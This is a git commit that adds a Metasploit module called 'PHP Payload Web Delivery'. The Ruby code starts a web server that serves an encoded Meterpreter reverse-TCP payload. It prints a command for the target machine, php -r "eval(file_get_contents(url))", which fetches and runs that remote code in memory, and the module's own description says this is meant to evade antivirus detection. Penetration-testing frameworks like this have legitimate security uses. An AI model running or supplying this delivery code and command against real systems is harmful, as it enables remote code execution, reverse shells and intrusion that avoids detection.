Added php_web_delivery

bug/bundler_fix
jakxx 2014-02-20 13:41:18 -05:00
parent 45d554e6d9
commit 1834784b93
1 changed files with 60 additions and 0 deletions

View File

@ -0,0 +1,60 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Payload Web Delivery',
'Description' => %q{
This module quickly fires up a web server that serves a PHP payload.
The provided command will start PHP and then download and execute the
payload. The main purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
write to disk so is less likely to trigger AV solutions.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrew Smith "jakx_" <jakx.ppr@gmail.com>',
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure
],
'DefaultOptions' =>
{
'Payload' => 'php/meterpreter/reverse_tcp'
},
'References' =>
[
[ 'URL', 'http://www.securitypadawan.blogspot.com/2.html']
],
'Platform' => 'php',
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'N/A'))
end
def on_request_uri(cli, request)
print_status("Delivering Payload")
data = %Q|#{payload.encoded} ?>|
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
def primer
url = get_uri()
print_status("Run the following command on the target machine:")
print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
end
end